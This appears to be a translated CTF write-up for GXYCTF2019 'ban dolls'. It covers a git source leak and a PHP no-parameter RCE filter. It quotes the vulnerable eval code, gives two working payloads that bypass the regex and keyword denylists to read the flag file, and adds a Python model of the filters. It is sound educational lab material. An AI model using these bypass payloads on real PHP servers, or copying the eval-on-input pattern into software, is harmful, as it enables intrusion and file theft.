[GXYCTF2019] ban dolls
2022-07-29 20:45:00 【Wei Xiaosheng lost his mind】
Test points:
git leak
No-parameter RCE
Solution:
Scan with dirsearch, and the flag should be readable.
Then use github to find the leaked source code:
";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("Almost!");}}else{die("Think about it!");}}else{die("I still want to read flag, stinky brother!");}}// highlight_file(__FILE__);?>Using exp to pass parameters also has many filtering restrictions, can not read with pseudo-protocol, but also use regular matching
There is no parameter rce
First bypass the pseudo-protocol and then execute if ';' ===preg_replace
The (?R)? in the if represents the current expression, which is /[a-z,_]+((?R)?/), so it is a kind of recursion, ?Represents recursive current expression 1 or 0 times (if (?R)* represents recursive current expression 0 or more times, it can match a(b(c()d())))
There are three general bypassing postures for no-parameter RCE:
getallheaders()
get_defined_vars()
session_id()
The keyword filter then rules some of these out: anything containing "get" cannot be used, because "et" is on the denylist.
scandir() can also be used to list the files in the current directory.
1. exp:
exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));
The highlight_file() function performs syntax highlighting on a file; it is an alias of show_source().
next() outputs the value of the next element in the array (after the current one).
The array_reverse() function returns the array with its elements in reverse order (its main job here is to produce the right order).
The scandir() function returns an array of the files and directories in the specified directory.
pos() outputs the value of the current element in the array.
The localeconv() function returns an array containing local number and currency format information. The first element of the array is ".".
So localeconv() returns a ".", pos() picks that "." out, and in the payload we constructed it makes scandir() return the listing of the current directory as an array. array_reverse() outputs that array in reverse order (so that the queried content comes out in the wanted order), next() then extracts the second element (filtering out "."), and finally highlight_file() displays the flag.
2. exp:
?exp=highlight_file(session_id(session_start()));
The regular filter above does not filter out session_id().
We can use session_id() to get the flag.
session_start() is also needed to start a session, because PHP does not start the session by default.
session_id() can then get the current session id.
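To see exactly what the three checks in the leaked source let through, here is an added Python model of them (not the challenge's own PHP). The two regular expressions are copied from the source above; `_match_call` re-implements the recursive `/[a-z,_]+\((?R)?\)/` pattern, with a `star` switch that shows the (?R)* behaviour discussed earlier, and `filter_stage` reports which `die()` an input would hit. The function names and the sample inputs are mine.

```python
import re

# Denylists copied from the challenge source (case-insensitive, like the PHP /i flag).
PROTOCOL_RE = re.compile(r"data://|filter://|php://|phar://", re.I)
KEYWORD_RE = re.compile(r"et|na|info|dec|bin|hex|oct|pi|log", re.I)
# Same character class as the PHP pattern; case-sensitive, as in the original.
NAME_RE = re.compile(r"[a-z,_]+")


def _match_call(s, i, star):
    """Try to match /[a-z,_]+\((?R)?\)/ at index i (the (?R)* variant when
    star=True). Returns the index just past the match, or None on failure."""
    m = NAME_RE.match(s, i)
    if not m or m.end() >= len(s) or s[m.end()] != "(":
        return None
    j = m.end() + 1
    # (?R)? allows at most one nested call inside the parentheses;
    # (?R)* allows any number of nested calls back to back.
    inner = _match_call(s, j, star)
    while inner is not None:
        j = inner
        if not star:
            break
        inner = _match_call(s, j, star)
    if j < len(s) and s[j] == ")":
        return j + 1
    return None


def strip_calls(exp, star=False):
    """Emulate preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $exp): delete every
    leftmost, non-overlapping match and return whatever survives."""
    out, i = [], 0
    while i < len(exp):
        end = _match_call(exp, i, star)
        if end is None:
            out.append(exp[i])
            i += 1
        else:
            i = end
    return "".join(out)


def filter_stage(exp):
    """Report which check stops the input, or 'eval' if it reaches eval()."""
    if PROTOCOL_RE.search(exp):
        return "protocol"   # die("I still want to read flag, stinky brother!")
    if strip_calls(exp) != ";":
        return "structure"  # die("Think about it!")
    if KEYWORD_RE.search(exp):
        return "keyword"    # die("Almost!")
    return "eval"


if __name__ == "__main__":
    # Constructed sample inputs: the two payloads from the write-up plus three rejects.
    samples = [
        "highlight_file(next(array_reverse(scandir(pos(localeconv())))));",
        "highlight_file(session_id(session_start()));",
        "phpinfo();",                 # nests fine, but 'info' is on the keyword list
        "readfile('flag.php');",      # has a parameter, so the structure check fails
        "include('php://input');",    # pseudo-protocol
    ]
    for s in samples:
        print(f"{filter_stage(s):9s}  {s}")
    print(repr(strip_calls("a(b(c()d()))")), "<- (?R)? leaves two calls")
    print(repr(strip_calls("a(b(c()d()))", star=True)), "<- (?R)* matches everything")
```

Running it shows why both write-up payloads reach eval while anything with a literal argument stops at the structure check, and why `a(b(c()d()))` only collapses fully under the (?R)* variant: with (?R)? the engine can match `c()` and `d()` separately but never the enclosing `b(...)`.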

It's ready to go
